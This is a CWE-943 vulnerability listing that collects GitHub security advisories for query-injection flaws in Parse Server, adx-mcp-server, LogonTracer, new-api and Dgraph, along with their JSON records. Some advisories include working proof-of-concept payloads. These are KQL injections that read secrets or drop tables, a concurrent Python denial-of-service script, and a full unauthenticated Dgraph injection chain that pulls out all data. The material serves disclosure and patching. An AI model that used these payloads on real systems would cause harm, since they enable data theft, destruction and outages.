CWE-943
Allowed-with-ReviewImproper Neutralization of Special Elements in Data Query Logic
Abstraction: Class · Status: Incomplete
The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.
117 vulnerabilities reference this CWE, most recent first.
GHSA-VFQ7-RGVH-5GCX
Vulnerability from github – Published: 2026-03-16 15:30 – Updated: 2026-03-19 21:30Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint 'vets.wakyma.com/hospitalization/generate-hospitalization-summary'. This vulnerability could allow an authenticated user to alter a POST request to the affected endpoint for the purpose of injecting special NoSQL commands, resulting in the attacker being able to obtain customer reports.
{
"affected": [],
"aliases": [
"CVE-2026-3022"
],
"database_specific": {
"cwe_ids": [
"CWE-89",
"CWE-943"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-16T14:19:45Z",
"severity": "HIGH"
},
"details": "Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint \u0027vets.wakyma.com/hospitalization/generate-hospitalization-summary\u0027. This vulnerability could allow an authenticated user to alter a POST request to the affected endpoint for the purpose of injecting special NoSQL commands, resulting in the attacker being able to obtain customer reports.",
"id": "GHSA-vfq7-rgvh-5gcx",
"modified": "2026-03-19T21:30:20Z",
"published": "2026-03-16T15:30:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3022"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wakyma-application-web"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-VGJH-HMWF-C588
Vulnerability from github – Published: 2026-03-11 00:16 – Updated: 2026-03-11 00:16Impact
A NoSQL injection vulnerability allows an unauthenticated attacker to inject MongoDB query operators via the token field in the password reset and email verification resend endpoints. The token value is passed to database queries without type validation and can be used to extract password reset and email verification tokens.
Any Parse Server deployment using MongoDB with email verification or password reset enabled is affected. When emailVerifyTokenReuseIfValid is configured, the email verification token can be fully extracted and used to verify a user's email address without inbox access.
Patches
Patches
The vulnerability is fixed by adding input type validation at the endpoint level.
Workarounds
There is no known workaround.
References
- GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-vgjh-hmwf-c588
- Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.5.2-alpha.1
- Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.14
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.5.2-alpha.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.6.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30941"
],
"database_specific": {
"cwe_ids": [
"CWE-943"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T00:16:26Z",
"nvd_published_at": "2026-03-10T18:18:53Z",
"severity": "HIGH"
},
"details": "### Impact\n\nA NoSQL injection vulnerability allows an unauthenticated attacker to inject MongoDB query operators via the `token` field in the password reset and email verification resend endpoints. The `token` value is passed to database queries without type validation and can be used to extract password reset and email verification tokens.\n\nAny Parse Server deployment using MongoDB with email verification or password reset enabled is affected. When `emailVerifyTokenReuseIfValid` is configured, the email verification token can be fully extracted and used to verify a user\u0027s email address without inbox access.\n\n### Patches\n\n### Patches\n\nThe vulnerability is fixed by adding input type validation at the endpoint level.\n\n### Workarounds\n\nThere is no known workaround.\n\n### References\n\n- GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-vgjh-hmwf-c588\n- Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.5.2-alpha.1\n- Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.14",
"id": "GHSA-vgjh-hmwf-c588",
"modified": "2026-03-11T00:16:26Z",
"published": "2026-03-11T00:16:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-vgjh-hmwf-c588"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30941"
},
{
"type": "PACKAGE",
"url": "https://github.com/parse-community/parse-server"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/releases/tag/8.6.14"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/releases/tag/9.5.2-alpha.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Parse Server has a NoSQL injection via token type in password reset and email verification endpoints"
}
GHSA-VPHC-468G-8RFP
Vulnerability from github – Published: 2026-03-27 19:08 – Updated: 2026-03-30 20:17Summary
adx-mcp-server (<= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: get_table_schema, sample_table_data, and get_table_details. The table_name parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.
Details
The MCP tools construct KQL queries by directly embedding the table_name parameter into query strings:
Vulnerable code (permalink):
@mcp.tool(...)
async def get_table_schema(table_name: str) -> List[Dict[str, Any]]:
client = get_kusto_client()
query = f"{table_name} | getschema" # <-- KQL injection
result_set = client.execute(config.database, query)
@mcp.tool(...)
async def sample_table_data(table_name: str, sample_size: int = 10) -> List[Dict[str, Any]]:
client = get_kusto_client()
query = f"{table_name} | sample {sample_size}" # <-- KQL injection
result_set = client.execute(config.database, query)
@mcp.tool(...)
async def get_table_details(table_name: str) -> List[Dict[str, Any]]:
client = get_kusto_client()
query = f".show table {table_name} details" # <-- KQL injection
result_set = client.execute(config.database, query)
KQL allows chaining query operators with | and executing management commands prefixed with .. An attacker can inject:
- sensitive_table | project Secret, Password | take 100 // to read arbitrary tables
- Newline-separated management commands like .drop table important_data via get_table_details
- Arbitrary KQL analytics queries via any of the three tools
Note: While the server also has an execute_query tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to "safe" tools while requiring confirmation for execute_query. The injection bypasses this trust boundary.
PoC
# PoC: KQL Injection via get_table_schema tool
# The table_name parameter is injected into: f"{table_name} | getschema"
import json
# MCP tool call that exfiltrates data from a sensitive table
tool_call = {
"name": "get_table_schema",
"arguments": {
"table_name": "sensitive_data | project Secret, Password | take 100 //"
}
}
print(json.dumps(tool_call, indent=2))
# Resulting KQL: "sensitive_data | project Secret, Password | take 100 // | getschema"
# The // comments out "| getschema", executing an arbitrary data query instead
# Destructive example via get_table_details:
tool_call_destructive = {
"name": "get_table_details",
"arguments": {
"table_name": "users details\n.drop table critical_data"
}
}
# Resulting KQL:
# .show table users details
# .drop table critical_data details
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "adx-mcp-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33980"
],
"database_specific": {
"cwe_ids": [
"CWE-943"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T19:08:09Z",
"nvd_published_at": "2026-03-27T22:16:22Z",
"severity": "HIGH"
},
"details": "### Summary\n\nadx-mcp-server (\u003c= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: `get_table_schema`, `sample_table_data`, and `get_table_details`. The `table_name` parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.\n\n### Details\n\nThe MCP tools construct KQL queries by directly embedding the `table_name` parameter into query strings:\n\n**Vulnerable code** ([permalink](https://github.com/pab1it0/adx-mcp-server/blob/48b2933/src/adx_mcp_server/server.py#L228)):\n\n```python\n@mcp.tool(...)\nasync def get_table_schema(table_name: str) -\u003e List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\"{table_name} | getschema\" # \u003c-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def sample_table_data(table_name: str, sample_size: int = 10) -\u003e List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\"{table_name} | sample {sample_size}\" # \u003c-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def get_table_details(table_name: str) -\u003e List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\".show table {table_name} details\" # \u003c-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\nKQL allows chaining query operators with `|` and executing management commands prefixed with `.`. An attacker can inject:\n- `sensitive_table | project Secret, Password | take 100 //` to read arbitrary tables\n- Newline-separated management commands like `.drop table important_data` via `get_table_details`\n- Arbitrary KQL analytics queries via any of the three tools\n\n**Note:** While the server also has an `execute_query` tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to \"safe\" tools while requiring confirmation for `execute_query`. The injection bypasses this trust boundary.\n\n### PoC\n\n```python\n# PoC: KQL Injection via get_table_schema tool\n# The table_name parameter is injected into: f\"{table_name} | getschema\"\n\nimport json\n\n# MCP tool call that exfiltrates data from a sensitive table\ntool_call = {\n \"name\": \"get_table_schema\",\n \"arguments\": {\n \"table_name\": \"sensitive_data | project Secret, Password | take 100 //\"\n }\n}\nprint(json.dumps(tool_call, indent=2))\n\n# Resulting KQL: \"sensitive_data | project Secret, Password | take 100 // | getschema\"\n# The // comments out \"| getschema\", executing an arbitrary data query instead\n\n# Destructive example via get_table_details:\ntool_call_destructive = {\n \"name\": \"get_table_details\",\n \"arguments\": {\n \"table_name\": \"users details\\n.drop table critical_data\"\n }\n}\n# Resulting KQL:\n# .show table users details\n# .drop table critical_data details\n```",
"id": "GHSA-vphc-468g-8rfp",
"modified": "2026-03-30T20:17:30Z",
"published": "2026-03-27T19:08:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pab1it0/adx-mcp-server/security/advisories/GHSA-vphc-468g-8rfp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33980"
},
{
"type": "WEB",
"url": "https://github.com/pab1it0/adx-mcp-server/commit/0abe0ee55279e111281076393e5e966335fffd30"
},
{
"type": "PACKAGE",
"url": "https://github.com/pab1it0/adx-mcp-server"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Azure Data Explorer MCP Server: KQL Injection in multiple tools allows MCP client to execute arbitrary Kusto queries"
}
GHSA-VQG4-6JF2-58RX
Vulnerability from github – Published: 2026-04-27 00:30 – Updated: 2026-04-27 00:30There is a cypher injection issue in LogonTracer prior to v2.0.0. If specially crafted Windows event log data is loaded, the contents of the database may be altered.
{
"affected": [],
"aliases": [
"CVE-2026-33566"
],
"database_specific": {
"cwe_ids": [
"CWE-943"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-27T00:16:20Z",
"severity": "MODERATE"
},
"details": "There is a cypher injection issue in LogonTracer prior to v2.0.0. If specially crafted Windows event log data is loaded, the contents of the database may be altered.",
"id": "GHSA-vqg4-6jf2-58rx",
"modified": "2026-04-27T00:30:27Z",
"published": "2026-04-27T00:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33566"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN57877356"
},
{
"type": "WEB",
"url": "https://www.jpcert.or.jp/press/2026/PR20260423.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-W6X6-9FP7-FQM4
Vulnerability from github – Published: 2026-02-23 21:56 – Updated: 2026-02-27 21:42Summary
A SQL LIKE wildcard injection vulnerability in the /api/token/search endpoint allows authenticated users to cause Denial of Service through resource exhaustion by crafting malicious search patterns.
Details
The token search endpoint accepts user-supplied keyword and token parameters that are directly concatenated into SQL LIKE clauses without escaping wildcard characters (%, _). This allows attackers to inject patterns that trigger expensive database queries.
Vulnerable Code
File: model/token.go:70
err = DB.Where("user_id = ?", userId).
Where("name LIKE ?", "%"+keyword+"%"). // No wildcard escaping
Where(commonKeyCol+" LIKE ?", "%"+token+"%").
Find(&tokens).Error
PoC
After creating over 2 million tokens, creating millions token entries is not difficult, because the rate limiting only applies to IP addresses, so multiple IP addresses can share one session, allowing for the creation of an unlimited number of tokens in batches.
These data are not all loaded at once under normal circumstances, as shown in the image, and are displayed correctly. But if a request like this is submitted:
# A single request causes PostgreSQL to unconditionally retrieve all tokens belonging to that user. These requests buffer will all go into the buffer zone, causing an overflow and preventing the program from functioning properly.
curl 'http://localhost:3000/api/token/search?keyword=%&token='
It will cause DoS.
import requests
from concurrent.futures import ThreadPoolExecutor
def attack(session_cookie):
requests.get(
'http://localhost:3000/api/token/search',
params={'keyword': '%_%_%_%_%_%', 'token': ''},
cookies={'session': session_cookie},
headers={'New-API-User': '1'}
)
# Launch 50 concurrent malicious requests
with ThreadPoolExecutor(max_workers=50) as executor:
for _ in range(50):
executor.submit(attack, '<valid_session>')
Impact
Availability
RAM Overflow
Postgres unavailable
- Database CPU usage spike to 100%
- Application memory exhaustion
- Legitimate user requests blocked or significantly delayed
- Potential application crash or database connection pool exhaustion
Database Performance
Testing with 2,000,000 tokens:
| Pattern | Query Time | Rows | Impact |
|---|---|---|---|
test (normal) |
~50ms | 0 | Low |
% (full scan) |
5,973ms | 2,000,000 | High |
%_%_%_%_%_% |
6,200ms+ | 2,000,000 | Very High |
Attack Scalability
- Single attacker: Can launch 10-50 concurrent requests easily
- Multiple accounts: Attacker can register multiple accounts (if registration enabled)
- Proxy rotation: IP-based rate limiting can be bypassed
- Persistence: Attack can be sustained indefinitely
Resource Consumption
Each malicious request with 2M results: - Database: ~6 seconds CPU time - Network: ~200MB data transfer - Application Memory: ~200MB+ for JSON serialization - Connection Time: Database connection held for entire query duration
Exploitation Scenario
- Attacker registers or compromises a regular user account
- Attacker crafts malicious LIKE patterns using
%wildcards - Attacker launches concurrent requests (50-200 concurrent)
- Database becomes overwhelmed with slow queries
- Application memory exhausts from processing large result sets
- Legitimate users experience service degradation or complete unavailability
## Patch Recommendations
1. Escape LIKE Wildcards (Critical)
func escapeLike(s string) string {
s = strings.ReplaceAll(s, "\\", "\\\\")
s = strings.ReplaceAll(s, "%", "\\%")
s = strings.ReplaceAll(s, "_", "\\_")
return s
}
func SearchUserTokens(userId int, keyword string, token string) (tokens []*Token, err error) {
keyword = escapeLike(keyword)
token = strings.Trim(token, "sk-")
token = escapeLike(token)
err = DB.Where("user_id = ?", userId).
Where("name LIKE ? ESCAPE '\\\\'", "%"+keyword+"%").
Where(commonKeyCol+" LIKE ? ESCAPE '\\\\'", "%"+token+"%").
Limit(1000).
Find(&tokens).Error
return tokens, err
}
2. Add User-Level Rate Limiting
tokenRoute.GET("/search",
middleware.TokenSearchRateLimit(), // 30 req/min per user
controller.SearchTokens)
3. Add Query Timeout
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
err = DB.WithContext(ctx).Where(...).Find(&tokens).Error
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/QuantumNous/new-api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.10.8-alpha.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25591"
],
"database_specific": {
"cwe_ids": [
"CWE-943"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-23T21:56:47Z",
"nvd_published_at": "2026-02-24T01:16:13Z",
"severity": "HIGH"
},
"details": "### Summary\nA SQL LIKE wildcard injection vulnerability in the `/api/token/search` endpoint allows authenticated users to cause Denial of Service through resource exhaustion by crafting malicious search patterns.\n\n### Details\nThe token search endpoint accepts user-supplied `keyword` and `token` parameters that are directly concatenated into SQL LIKE clauses without escaping wildcard characters (`%`, `_`). This allows attackers to inject patterns that trigger expensive database queries.\n\n### Vulnerable Code\nFile: `model/token.go:70`\n```go\nerr = DB.Where(\"user_id = ?\", userId).\n Where(\"name LIKE ?\", \"%\"+keyword+\"%\"). // No wildcard escaping\n Where(commonKeyCol+\" LIKE ?\", \"%\"+token+\"%\").\n Find(\u0026tokens).Error\n```\n\n### PoC\n\nAfter creating over 2 million tokens, creating millions token entries is not difficult, because the rate limiting only applies to IP addresses, so multiple IP addresses can share one session, allowing for the creation of an unlimited number of tokens in batches.\n\n\u003cimg width=\"1636\" height=\"659\" alt=\"image\" src=\"https://github.com/user-attachments/assets/55e63dcd-884d-41bc-9bea-4300ba1b50c6\" /\u003e\n\nThese data are not all loaded at once under normal circumstances, as shown in the image, and are displayed correctly. But if a request like this is submitted:\n\n```bash\n# A single request causes PostgreSQL to unconditionally retrieve all tokens belonging to that user. These requests buffer will all go into the buffer zone, causing an overflow and preventing the program from functioning properly.\ncurl \u0027http://localhost:3000/api/token/search?keyword=%\u0026token=\u0027\n```\n\n\u003cimg width=\"491\" height=\"350\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c31d9639-3550-4e93-8735-fba068f56124\" /\u003e\n\nIt will cause DoS.\n\n```python\nimport requests\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef attack(session_cookie):\n requests.get(\n \u0027http://localhost:3000/api/token/search\u0027,\n params={\u0027keyword\u0027: \u0027%_%_%_%_%_%\u0027, \u0027token\u0027: \u0027\u0027},\n cookies={\u0027session\u0027: session_cookie},\n headers={\u0027New-API-User\u0027: \u00271\u0027}\n )\n\n# Launch 50 concurrent malicious requests\nwith ThreadPoolExecutor(max_workers=50) as executor:\n for _ in range(50):\n executor.submit(attack, \u0027\u003cvalid_session\u003e\u0027)\n```\n\n### Impact\n**Availability**\n\nRAM Overflow\n\n\u003cimg width=\"1078\" height=\"145\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c0bb5159-6943-42bd-a9f4-5c60c57fb149\" /\u003e\n\nPostgres unavailable\n\n\u003cimg width=\"772\" height=\"185\" alt=\"image\" src=\"https://github.com/user-attachments/assets/245e4f59-0ec5-4f9b-a839-3c9bb61be14b\" /\u003e\n\n- Database CPU usage spike to 100%\n- Application memory exhaustion\n- Legitimate user requests blocked or significantly delayed\n- Potential application crash or database connection pool exhaustion\n\n### Database Performance\n\nTesting with 2,000,000 tokens:\n\n| Pattern | Query Time | Rows | Impact |\n|---------|-----------|------|--------|\n| `test` (normal) | ~50ms | 0 | Low |\n| `%` (full scan) | 5,973ms | 2,000,000 | High |\n| `%_%_%_%_%_%` | 6,200ms+ | 2,000,000 | Very High |\n\n### Attack Scalability\n\n- **Single attacker**: Can launch 10-50 concurrent requests easily\n- **Multiple accounts**: Attacker can register multiple accounts (if registration enabled)\n- **Proxy rotation**: IP-based rate limiting can be bypassed\n- **Persistence**: Attack can be sustained indefinitely\n\n### Resource Consumption\n\nEach malicious request with 2M results:\n- **Database**: ~6 seconds CPU time\n- **Network**: ~200MB data transfer\n- **Application Memory**: ~200MB+ for JSON serialization\n- **Connection Time**: Database connection held for entire query duration\n\n## Exploitation Scenario\n\n1. Attacker registers or compromises a regular user account\n2. Attacker crafts malicious LIKE patterns using `%` wildcards\n3. Attacker launches concurrent requests (50-200 concurrent)\n4. Database becomes overwhelmed with slow queries\n5. Application memory exhausts from processing large result sets\n6. Legitimate users experience service degradation or complete unavailability\n\n ## Patch Recommendations\n### 1. Escape LIKE Wildcards (Critical)\n```go\nfunc escapeLike(s string) string {\n s = strings.ReplaceAll(s, \"\\\\\", \"\\\\\\\\\")\n s = strings.ReplaceAll(s, \"%\", \"\\\\%\")\n s = strings.ReplaceAll(s, \"_\", \"\\\\_\")\n return s\n}\n\nfunc SearchUserTokens(userId int, keyword string, token string) (tokens []*Token, err error) {\n keyword = escapeLike(keyword)\n token = strings.Trim(token, \"sk-\")\n token = escapeLike(token)\n\n err = DB.Where(\"user_id = ?\", userId).\n Where(\"name LIKE ? ESCAPE \u0027\\\\\\\\\u0027\", \"%\"+keyword+\"%\").\n Where(commonKeyCol+\" LIKE ? ESCAPE \u0027\\\\\\\\\u0027\", \"%\"+token+\"%\").\n Limit(1000).\n Find(\u0026tokens).Error\n return tokens, err\n}\n```\n\n### 2. Add User-Level Rate Limiting\n```go\ntokenRoute.GET(\"/search\",\n middleware.TokenSearchRateLimit(), // 30 req/min per user\n controller.SearchTokens)\n```\n\n### 3. Add Query Timeout\n```go\nctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)\ndefer cancel()\nerr = DB.WithContext(ctx).Where(...).Find(\u0026tokens).Error\n```",
"id": "GHSA-w6x6-9fp7-fqm4",
"modified": "2026-02-27T21:42:31Z",
"published": "2026-02-23T21:56:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-w6x6-9fp7-fqm4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25591"
},
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/commit/3e1be18310f35d20742683ca9e4bf3bcafc173c5"
},
{
"type": "PACKAGE",
"url": "https://github.com/QuantumNous/new-api"
},
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/releases/tag/v0.10.8-alpha.10"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2026-4531"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "New API has an SQL LIKE Wildcard Injection DoS via Token Search"
}
GHSA-X92X-PX7W-4GX4
Vulnerability from github – Published: 2026-04-24 15:41 – Updated: 2026-07-08 00:341. Executive Summary
A vulnerability has been found in Dgraph that gives an unauthenticated attacker full read access to every piece of data in the database. This affects Dgraph's default configuration where ACL is not enabled.
The attack requires two HTTP POSTs to port 8080. The first sets up a schema predicate with @unique @index(exact) @lang via /alter (also unauthenticated in default config). The second sends a crafted JSON mutation to /mutate?commitNow=true where a JSON key contains the predicate name followed by @ and a DQL injection payload in the language tag position.
The injection exploits the addQueryIfUnique function in edgraph/server.go, which constructs DQL queries using fmt.Sprintf with unsanitized predicateName that includes the raw pred.Lang value. The Lang field is extracted from JSON mutation keys by x.PredicateLang(), which splits on @, and is never validated by any function in the codebase. The attacker injects a closing parenthesis to escape the eq() function, adds an arbitrary named query block, and uses a # comment to neutralize trailing template syntax. The injected query executes server-side and its results are returned in the HTTP response.
POC clip:
https://github.com/user-attachments/assets/bbfb7bba-c957-4b57-b534-48a958314186
2. CVSS Score
CVSS 3.1: 9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network | HTTP POST to port 8080 |
| Attack Complexity | Low | Two requests, deterministic outcome, no special conditions |
| Privileges Required | None | No authentication when ACL is disabled (default) |
| User Interaction | None | Fully automated |
| Scope | Unchanged | Stays within the Dgraph data layer |
| Confidentiality | High | Full database exfiltration: all nodes, all predicates, all values |
| Integrity | High | The mutation that carries the injection also writes data; the attacker can also set up arbitrary schema via unauthenticated /alter |
| Availability | None | No denial of service |
3. Vulnerability Summary
| Field | Value |
|---|---|
| Title | Pre-Auth DQL Injection via Unsanitized NQuad Lang Field in addQueryIfUnique |
| Type | Injection |
| CWE | CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) |
| CVSS | 9.8 |
4. Target Information
| Field | Value |
|---|---|
| Project | Dgraph |
| Repository | https://github.com/dgraph-io/dgraph |
| Tested version | v25.3.0 |
| Lang split | x/x.go line 919 (PredicateLang splits on @, returns everything after as Lang) |
| Lang assignment | chunker/json_parser.go line 524 (nq.Predicate, nq.Lang = x.PredicateLang(nq.Predicate)) |
| Validation gap | edgraph/server.go line 2142 (validateKeys checks nq.Predicate only, never nq.Lang) |
| Injection sink | edgraph/server.go line 1808 (fmt.Sprintf with predicateName containing raw pred.Lang) |
| predicateName build | edgraph/server.go line 1780 (fmt.Sprintf("%v@%v", predicateName, pred.Lang)) |
| Auth bypass (query) | edgraph/access.go line 958 (authorizeQuery returns nil when AclSecretKey == nil) |
| Auth bypass (mutate) | edgraph/access.go line 788 (authorizeMutation returns nil when AclSecretKey == nil) |
| Response exfiltration | dgraph/cmd/alpha/http.go line 498 (mp["queries"] = json.RawMessage(resp.Json)) |
| HTTP port | 8080 (default) |
| Prerequisite | A predicate with @unique @index(exact) @lang in the schema. The attacker can create this via unauthenticated /alter. |
5. Test Environment
| Component | Version / Details |
|---|---|
| Host OS | macOS (darwin 25.3.0) |
| Dgraph | v25.3.0 via dgraph/dgraph:latest Docker image |
| Docker Compose | 1 Zero + 1 Alpha, default config, whitelist=0.0.0.0/0 |
| Python | 3.x with requests |
| Network | localhost (127.0.0.1) |
6. Vulnerability Detail
Location: edgraph/server.go lines 1778-1808 (addQueryIfUnique)
CWE: CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)
The /mutate endpoint accepts JSON mutations. When a predicate has the @unique directive, the addQueryIfUnique function builds a DQL query to check whether the value already exists.
The JSON chunker at json_parser.go:524 splits mutation keys on @ via x.PredicateLang:
nq.Predicate, nq.Lang = x.PredicateLang(nq.Predicate)
PredicateLang at x/x.go:919 splits on the last @ and returns everything after it as the Lang string with no validation:
func PredicateLang(s string) (string, string) {
i := strings.LastIndex(s, "@")
if i <= 0 {
return s, ""
}
return s[0:i], s[i+1:]
}
validateKeys at server.go:2142 validates only nq.Predicate. It never touches nq.Lang:
func validateKeys(nq *api.NQuad) error {
if err := validateKey(nq.Predicate); err != nil {
return errors.Wrapf(err, "predicate %q", nq.Predicate)
}
for i := range nq.Facets {
// ... validates facet keys ...
}
return nil // nq.Lang is never checked
}
addQueryIfUnique at server.go:1778-1808 builds predicateName from the predicate and the raw Lang, then interpolates it into a DQL query via fmt.Sprintf:
predicateName := fmt.Sprintf("<%v>", pred.Predicate)
if pred.Lang != "" {
predicateName = fmt.Sprintf("%v@%v", predicateName, pred.Lang)
}
// ...
query := fmt.Sprintf(`%v as var(func: eq(%v,"%v"))`, queryVar, predicateName, val[1:len(val)-1])
There is no escaping, no parameterization, no structural validation, and no character allowlist applied to pred.Lang anywhere between the HTTP input and the fmt.Sprintf query construction.
An attacker crafts a JSON mutation key:
name@en,"x")) leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key } } #
After PredicateLang splits on @:
Predicate=name(passes all validation)Lang=en,"x")) leak(func: has(dgraph.type)) { ... } } #(never validated)
The constructed DQL becomes:
{
__dgraph_uniquecheck_0__ as var(func: eq(<name>@en,"x"))
leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key }
}
The # comment neutralizes any trailing syntax from the template. The DQL parser accepts this as two valid query blocks: a var query (returns empty) and a named leak query that exfiltrates all data. The uniqueness check passes (no existing name@en equals "x"), so the mutation succeeds, and the injected query results are returned in data.queries.leak.
7. Full Chain Explanation
The attacker has no Dgraph credentials and no prior access to the server.
Step 1. The attacker creates the required schema via unauthenticated /alter:
POST /alter HTTP/1.1
Host: TARGET:8080
name: string @unique @index(exact) @lang .
No X-Dgraph-AccessToken header. In default configuration, /alter has no authentication when ACL is disabled.
Step 2. The attacker sends the injection payload:
POST /mutate?commitNow=true HTTP/1.1
Host: TARGET:8080
Content-Type: application/json
{
"set": [{
"uid": "_:inject",
"name@en,\"x\")) leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key } } #": "anything"
}]
}
Step 3. mutationHandler at http.go:345 parses the JSON body. The key name@en,... is treated as predicate name with language tag en,"x")) leak(...) } } #.
Step 4. x.PredicateLang at x.go:919 splits the key on the last @. The Predicate is name. The Lang is the injection payload.
Step 5. validateKeys at server.go:2142 validates only nq.Predicate (name), which passes. nq.Lang is never checked.
Step 6. addQueryIfUnique at server.go:1778 constructs predicateName by appending the raw pred.Lang at line 1780. At line 1808, fmt.Sprintf interpolates this into the DQL query string.
Step 7. dql.ParseWithNeedVars parses the constructed DQL. It encounters the original var query and the injected leak query. Both are accepted as valid DQL.
Step 8. authorizeQuery at access.go:958 returns nil because AclSecretKey == nil (default). No predicate-level authorization is performed.
